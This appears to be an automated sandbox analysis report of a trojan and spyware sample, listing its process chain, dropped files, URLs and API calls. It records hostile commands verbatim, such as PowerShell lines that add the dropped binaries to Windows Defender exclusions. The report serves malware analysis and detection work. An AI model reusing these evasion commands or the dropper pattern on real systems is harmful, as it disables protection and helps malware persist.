Source: qmgr.db.44.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.44.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.2406244042.000001BF31918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C7BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: chainportruntimeCrtMonitor.exe, 00000005.00000002.2217563085.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2406244042.000001BF316F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C79C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301411000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.2406244042.000001BF31918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C7BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001B.00000002.3227892633.0000028D53506000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000016.00000002.3265075203.000001BF4996E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3280863861.00000181DFE52000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3234116685.00000181DFB96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000016.00000002.2406244042.000001BF316F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C79C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000002C.00000003.2407087225.0000021BDCB23000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000002C.00000003.2407087225.0000021BDCAB0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.44.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Recovery\DtJTopEKFGnyRQt.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007B6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_007B6FAA

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Media\Heritage\75cd070fe4800c	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	File created: C:\Windows\Setup\State\75cd070fe4800c	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B848E	0_2_007B848E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B40FE	0_2_007B40FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C00B7	0_2_007C00B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C4088	0_2_007C4088
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C7153	0_2_007C7153
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D51C9	0_2_007D51C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B32F7	0_2_007B32F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C62CA	0_2_007C62CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C43BF	0_2_007C43BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BF461	0_2_007BF461
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DD440	0_2_007DD440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BC426	0_2_007BC426
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C77EF	0_2_007C77EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B286B	0_2_007B286B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DD8EE	0_2_007DD8EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E19F4	0_2_007E19F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BE9B7	0_2_007BE9B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C6CDC	0_2_007C6CDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C3E0B	0_2_007C3E0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BEFE2	0_2_007BEFE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D4F9A	0_2_007D4F9A
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Code function: 5_2_00007FF848F10D74	5_2_00007FF848F10D74
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Code function: 5_2_00007FF8490C62FB	5_2_00007FF8490C62FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF848FE32C6	23_2_00007FF848FE32C6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 27_2_00007FF849002E11	27_2_00007FF849002E11
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F30D74	32_2_00007FF848F30D74
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F4ADFD	32_2_00007FF848F4ADFD
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F4C34C	32_2_00007FF848F4C34C
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F3F012	32_2_00007FF848F3F012
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF848F7936D	32_2_00007FF848F7936D
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 32_2_00007FF8494AE5F1	32_2_00007FF8494AE5F1
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F6936D	33_2_00007FF848F6936D
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F3ADFD	33_2_00007FF848F3ADFD
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F2F012	33_2_00007FF848F2F012
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Code function: 33_2_00007FF848F20D74	33_2_00007FF848F20D74
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Code function: 42_2_00007FF848F30D74	42_2_00007FF848F30D74

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AGJJGYBl.log DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007CEB78 appears 39 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007CF5F0 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 007CEC50 appears 56 times

Source: file.exe, 00000000.00000003.2034998981.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs file.exe
Source: file.exe, 00000000.00000003.2034998981.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: chainportruntimeCrtMonitor.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DtJTopEKFGnyRQt.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DtJTopEKFGnyRQt.exe0.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DtJTopEKFGnyRQt.exe1.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sppsvc.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@37/68@0/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007B6C74 GetLastError,FormatMessageW,

0_2_007B6C74

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_007CA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_007CA6C2

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

File created: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe

Jump to behavior

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

File created: C:\Users\user\Desktop\gMOMTVsR.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
Source: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Recovery\DtJTopEKFGnyRQt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\6debd4f4d7d9d55a90240b8cfae44a84a1758f30aa4344dbcd056f725fb9cbca

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe

File created: C:\Users\user\AppData\Local\Temp\6Nlwo6XyRo

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "

Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxname	0_2_007CDF1E
Source: C:\Users\user\Desktop\file.exe	Command line argument: sfxstime	0_2_007CDF1E
Source: C:\Users\user\Desktop\file.exe	Command line argument: STARTDLG	0_2_007CDF1E

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dDxCJXSQW6.32.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Recovery\DtJTopEKFGnyRQt.exe C:\Recovery\DtJTopEKFGnyRQt.exe
Source: unknown	Process created: C:\Recovery\DtJTopEKFGnyRQt.exe C:\Recovery\DtJTopEKFGnyRQt.exe
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe "C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\zXrLq55h.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\DtJTopEKFGnyRQt.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsContainer\sppsvc.exe'	Jump to behavior
Source: C:\MsContainer\chainportruntimeCrtMonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe "C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
